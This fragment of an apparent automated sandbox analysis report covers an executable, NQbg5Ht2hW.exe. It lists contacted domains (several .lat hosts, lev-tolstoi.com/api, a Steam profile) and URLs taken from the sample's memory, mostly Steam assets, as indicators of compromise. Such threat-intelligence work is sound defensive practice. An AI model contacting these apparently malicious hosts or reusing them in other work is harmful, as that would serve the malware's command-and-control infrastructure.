          • 0%, URL Reputation
          		unknown
          rapeflowwj.lat
          		unknown
          		unknownfalse
            		high
            grannyejh.lat
            		unknown
            		unknownfalse
              		high
              aspecteirs.lat
              		unknown
              		unknownfalse
                		high
                sweepyribs.lat
                		unknown
                		unknownfalse
                  		high
                  discokeyus.lat
                  		unknown
                  		unknownfalse
                    		high
                    energyaffai.lat
                    		unknown
                    		unknownfalse
                      		high
                      necklacebudi.lat
                      		unknown
                      		unknowntrue
                      • 0%, URL Reputation
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      aspecteirs.latfalse
                        		high
                        sweepyribs.latfalse
                          		high
                          sustainskelet.latfalse
                            		high
                            rapeflowwj.latfalse
                              		high
                              https://steamcommunity.com/profiles/76561199724331900false
                                		high
                                energyaffai.latfalse
                                  		high
                                  https://lev-tolstoi.com/apifalse
                                    		high
                                    grannyejh.latfalse
                                      		high
                                      necklacebudi.latfalse
                                        		high
                                        crosshuaht.latfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://player.vimeo.comNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://steamcommunity.com/?subsection=broadcastsNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://community.fastly.steamstNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://store.steampowered.com/subscriber_agreement/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEENQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.valvesoftware.com/legal.htmNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.youtube.comNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.google.comNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&lBNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackNQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.fastly.steamstatic.com/public/javascript/jquery-1.11NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://s.ytimg.com;NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://lev-tolstoi.com/NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716776835.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://store.steampowered.com/privacy_agreement/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://store.steampowered.com/points/shop/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://lev-tolstoi.com/pi#NQbg5Ht2hW.exe, 00000000.00000003.1453145013.000000000064F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716776835.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://sketchfab.comNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lv.queniujq.cnNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.youtube.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://store.steampowered.com/privacy_agreement/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.google.com/recaptcha/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://checkout.steampowered.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/about/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://steamcommunity.com/my/wishlist/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://help.steampowered.com/en/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://steamcommunity.com/market/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/news/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=eNQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://store.steampowered.com/subscriber_agreement/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://steamcommunity.com/discussions/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/stats/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/steam_refunds/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/scriptac2NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/workshop/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://login.steampowered.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://store.steampowered.com/legal/NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enNQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampoweNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skinRNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
